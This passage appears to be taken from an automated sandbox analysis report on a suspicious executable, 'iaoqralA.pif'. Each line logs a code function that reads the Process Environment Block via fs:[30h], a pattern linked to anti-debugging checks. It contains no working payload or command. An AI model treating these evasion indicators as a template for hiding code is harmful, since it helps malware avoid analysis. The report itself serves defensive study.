                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C883C0 mov eax, dword ptr fs:[00000030h]17_2_30C883C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3C3CD mov eax, dword ptr fs:[00000030h]17_2_30D3C3CD
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C903E9 mov eax, dword ptr fs:[00000030h]17_2_30C903E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D553FC mov eax, dword ptr fs:[00000030h]17_2_30D553FC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB63FF mov eax, dword ptr fs:[00000030h]17_2_30CB63FF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F3E6 mov eax, dword ptr fs:[00000030h]17_2_30D3F3E6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F0 mov eax, dword ptr fs:[00000030h]17_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F0 mov eax, dword ptr fs:[00000030h]17_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E3F0 mov eax, dword ptr fs:[00000030h]17_2_30C9E3F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA438F mov eax, dword ptr fs:[00000030h]17_2_30CA438F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA438F mov eax, dword ptr fs:[00000030h]17_2_30CA438F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D5539D mov eax, dword ptr fs:[00000030h]17_2_30D5539D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E388 mov eax, dword ptr fs:[00000030h]17_2_30C7E388
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E388 mov eax, dword ptr fs:[00000030h]17_2_30C7E388
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E388 mov eax, dword ptr fs:[00000030h]17_2_30C7E388
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C78397 mov eax, dword ptr fs:[00000030h]17_2_30C78397
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C78397 mov eax, dword ptr fs:[00000030h]17_2_30C78397
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C78397 mov eax, dword ptr fs:[00000030h]17_2_30C78397
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD739A mov eax, dword ptr fs:[00000030h]17_2_30CD739A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD739A mov eax, dword ptr fs:[00000030h]17_2_30CD739A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB33A0 mov eax, dword ptr fs:[00000030h]17_2_30CB33A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB33A0 mov eax, dword ptr fs:[00000030h]17_2_30CB33A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA33A5 mov eax, dword ptr fs:[00000030h]17_2_30CA33A5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4A352 mov eax, dword ptr fs:[00000030h]17_2_30D4A352
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7D34C mov eax, dword ptr fs:[00000030h]17_2_30C7D34C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7D34C mov eax, dword ptr fs:[00000030h]17_2_30C7D34C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0035C mov eax, dword ptr fs:[00000030h]17_2_30D0035C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0035C mov eax, dword ptr fs:[00000030h]17_2_30D0035C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0035C mov eax, dword ptr fs:[00000030h]17_2_30D0035C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0035C mov ecx, dword ptr fs:[00000030h]17_2_30D0035C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0035C mov eax, dword ptr fs:[00000030h]17_2_30D0035C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0035C mov eax, dword ptr fs:[00000030h]17_2_30D0035C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55341 mov eax, dword ptr fs:[00000030h]17_2_30D55341
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79353 mov eax, dword ptr fs:[00000030h]17_2_30C79353
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79353 mov eax, dword ptr fs:[00000030h]17_2_30C79353
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D02349 mov eax, dword ptr fs:[00000030h]17_2_30D02349
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2437C mov eax, dword ptr fs:[00000030h]17_2_30D2437C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F367 mov eax, dword ptr fs:[00000030h]17_2_30D3F367
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C87370 mov eax, dword ptr fs:[00000030h]17_2_30C87370
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C87370 mov eax, dword ptr fs:[00000030h]17_2_30C87370
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C87370 mov eax, dword ptr fs:[00000030h]17_2_30C87370
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBA30B mov eax, dword ptr fs:[00000030h]17_2_30CBA30B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBA30B mov eax, dword ptr fs:[00000030h]17_2_30CBA30B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBA30B mov eax, dword ptr fs:[00000030h]17_2_30CBA30B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7C310 mov ecx, dword ptr fs:[00000030h]17_2_30C7C310
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA0310 mov ecx, dword ptr fs:[00000030h]17_2_30CA0310
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0930B mov eax, dword ptr fs:[00000030h]17_2_30D0930B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0930B mov eax, dword ptr fs:[00000030h]17_2_30D0930B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0930B mov eax, dword ptr fs:[00000030h]17_2_30D0930B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF32A mov eax, dword ptr fs:[00000030h]17_2_30CAF32A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C77330 mov eax, dword ptr fs:[00000030h]17_2_30C77330
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4132D mov eax, dword ptr fs:[00000030h]17_2_30D4132D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4132D mov eax, dword ptr fs:[00000030h]17_2_30D4132D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D554DB mov eax, dword ptr fs:[00000030h]17_2_30D554DB
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C804E5 mov ecx, dword ptr fs:[00000030h]17_2_30C804E5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D294E0 mov eax, dword ptr fs:[00000030h]17_2_30D294E0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B480 mov eax, dword ptr fs:[00000030h]17_2_30C7B480
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C89486 mov eax, dword ptr fs:[00000030h]17_2_30C89486
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C89486 mov eax, dword ptr fs:[00000030h]17_2_30C89486
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0A4B0 mov eax, dword ptr fs:[00000030h]17_2_30D0A4B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C864AB mov eax, dword ptr fs:[00000030h]17_2_30C864AB
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB34B0 mov eax, dword ptr fs:[00000030h]17_2_30CB34B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB44B0 mov ecx, dword ptr fs:[00000030h]17_2_30CB44B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F453 mov eax, dword ptr fs:[00000030h]17_2_30D3F453
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B440 mov eax, dword ptr fs:[00000030h]17_2_30C8B440
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B440 mov eax, dword ptr fs:[00000030h]17_2_30C8B440
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B440 mov eax, dword ptr fs:[00000030h]17_2_30C8B440
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B440 mov eax, dword ptr fs:[00000030h]17_2_30C8B440
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B440 mov eax, dword ptr fs:[00000030h]17_2_30C8B440
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8B440 mov eax, dword ptr fs:[00000030h]17_2_30C8B440
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE443 mov eax, dword ptr fs:[00000030h]17_2_30CBE443
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA245A mov eax, dword ptr fs:[00000030h]17_2_30CA245A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7645D mov eax, dword ptr fs:[00000030h]17_2_30C7645D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81460 mov eax, dword ptr fs:[00000030h]17_2_30C81460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81460 mov eax, dword ptr fs:[00000030h]17_2_30C81460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81460 mov eax, dword ptr fs:[00000030h]17_2_30C81460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81460 mov eax, dword ptr fs:[00000030h]17_2_30C81460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81460 mov eax, dword ptr fs:[00000030h]17_2_30C81460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9F460 mov eax, dword ptr fs:[00000030h]17_2_30C9F460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9F460 mov eax, dword ptr fs:[00000030h]17_2_30C9F460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9F460 mov eax, dword ptr fs:[00000030h]17_2_30C9F460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9F460 mov eax, dword ptr fs:[00000030h]17_2_30C9F460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9F460 mov eax, dword ptr fs:[00000030h]17_2_30C9F460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9F460 mov eax, dword ptr fs:[00000030h]17_2_30C9F460
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D5547F mov eax, dword ptr fs:[00000030h]17_2_30D5547F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAA470 mov eax, dword ptr fs:[00000030h]17_2_30CAA470
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAA470 mov eax, dword ptr fs:[00000030h]17_2_30CAA470
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAA470 mov eax, dword ptr fs:[00000030h]17_2_30CAA470
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA340D mov eax, dword ptr fs:[00000030h]17_2_30CA340D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB8402 mov eax, dword ptr fs:[00000030h]17_2_30CB8402
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB8402 mov eax, dword ptr fs:[00000030h]17_2_30CB8402
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB8402 mov eax, dword ptr fs:[00000030h]17_2_30CB8402
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7C427 mov eax, dword ptr fs:[00000030h]17_2_30C7C427
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E420 mov eax, dword ptr fs:[00000030h]17_2_30C7E420
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E420 mov eax, dword ptr fs:[00000030h]17_2_30C7E420
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7E420 mov eax, dword ptr fs:[00000030h]17_2_30C7E420
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBA430 mov eax, dword ptr fs:[00000030h]17_2_30CBA430
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D535D7 mov eax, dword ptr fs:[00000030h]17_2_30D535D7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D535D7 mov eax, dword ptr fs:[00000030h]17_2_30D535D7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D535D7 mov eax, dword ptr fs:[00000030h]17_2_30D535D7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE5CF mov eax, dword ptr fs:[00000030h]17_2_30CBE5CF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE5CF mov eax, dword ptr fs:[00000030h]17_2_30CBE5CF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB55C0 mov eax, dword ptr fs:[00000030h]17_2_30CB55C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA95DA mov eax, dword ptr fs:[00000030h]17_2_30CA95DA
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C865D0 mov eax, dword ptr fs:[00000030h]17_2_30C865D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBA5D0 mov eax, dword ptr fs:[00000030h]17_2_30CBA5D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBA5D0 mov eax, dword ptr fs:[00000030h]17_2_30CBA5D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D555C9 mov eax, dword ptr fs:[00000030h]17_2_30D555C9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBC5ED mov eax, dword ptr fs:[00000030h]17_2_30CBC5ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBC5ED mov eax, dword ptr fs:[00000030h]17_2_30CBC5ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C825E0 mov eax, dword ptr fs:[00000030h]17_2_30C825E0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE5E7 mov eax, dword ptr fs:[00000030h]17_2_30CAE5E7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15F4 mov eax, dword ptr fs:[00000030h]17_2_30CA15F4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15F4 mov eax, dword ptr fs:[00000030h]17_2_30CA15F4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15F4 mov eax, dword ptr fs:[00000030h]17_2_30CA15F4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15F4 mov eax, dword ptr fs:[00000030h]17_2_30CA15F4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15F4 mov eax, dword ptr fs:[00000030h]17_2_30CA15F4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15F4 mov eax, dword ptr fs:[00000030h]17_2_30CA15F4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB4588 mov eax, dword ptr fs:[00000030h]17_2_30CB4588
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0B594 mov eax, dword ptr fs:[00000030h]17_2_30D0B594
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0B594 mov eax, dword ptr fs:[00000030h]17_2_30D0B594
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7758F mov eax, dword ptr fs:[00000030h]17_2_30C7758F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7758F mov eax, dword ptr fs:[00000030h]17_2_30C7758F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7758F mov eax, dword ptr fs:[00000030h]17_2_30C7758F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C82582 mov eax, dword ptr fs:[00000030h]17_2_30C82582
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C82582 mov ecx, dword ptr fs:[00000030h]17_2_30C82582
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE59C mov eax, dword ptr fs:[00000030h]17_2_30CBE59C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15A9 mov eax, dword ptr fs:[00000030h]17_2_30CA15A9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15A9 mov eax, dword ptr fs:[00000030h]17_2_30CA15A9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15A9 mov eax, dword ptr fs:[00000030h]17_2_30CA15A9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15A9 mov eax, dword ptr fs:[00000030h]17_2_30CA15A9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA15A9 mov eax, dword ptr fs:[00000030h]17_2_30CA15A9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D135BA mov eax, dword ptr fs:[00000030h]17_2_30D135BA
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D135BA mov eax, dword ptr fs:[00000030h]17_2_30D135BA
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D135BA mov eax, dword ptr fs:[00000030h]17_2_30D135BA
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D135BA mov eax, dword ptr fs:[00000030h]17_2_30D135BA
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F5BE mov eax, dword ptr fs:[00000030h]17_2_30D3F5BE
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D005A7 mov eax, dword ptr fs:[00000030h]17_2_30D005A7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D005A7 mov eax, dword ptr fs:[00000030h]17_2_30D005A7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D005A7 mov eax, dword ptr fs:[00000030h]17_2_30D005A7
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF5B0 mov eax, dword ptr fs:[00000030h]17_2_30CAF5B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA45B1 mov eax, dword ptr fs:[00000030h]17_2_30CA45B1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA45B1 mov eax, dword ptr fs:[00000030h]17_2_30CA45B1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C88550 mov eax, dword ptr fs:[00000030h]17_2_30C88550
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C88550 mov eax, dword ptr fs:[00000030h]17_2_30C88550
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB656A mov eax, dword ptr fs:[00000030h]17_2_30CB656A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB656A mov eax, dword ptr fs:[00000030h]17_2_30CB656A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB656A mov eax, dword ptr fs:[00000030h]17_2_30CB656A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B562 mov eax, dword ptr fs:[00000030h]17_2_30C7B562
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBB570 mov eax, dword ptr fs:[00000030h]17_2_30CBB570
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBB570 mov eax, dword ptr fs:[00000030h]17_2_30CBB570
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB7505 mov eax, dword ptr fs:[00000030h]17_2_30CB7505
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB7505 mov ecx, dword ptr fs:[00000030h]17_2_30CB7505
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D54500 mov eax, dword ptr fs:[00000030h]17_2_30D54500
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55537 mov eax, dword ptr fs:[00000030h]17_2_30D55537
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE53E mov eax, dword ptr fs:[00000030h]17_2_30CAE53E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE53E mov eax, dword ptr fs:[00000030h]17_2_30CAE53E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE53E mov eax, dword ptr fs:[00000030h]17_2_30CAE53E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE53E mov eax, dword ptr fs:[00000030h]17_2_30CAE53E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAE53E mov eax, dword ptr fs:[00000030h]17_2_30CAE53E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2F525 mov eax, dword ptr fs:[00000030h]17_2_30D2F525
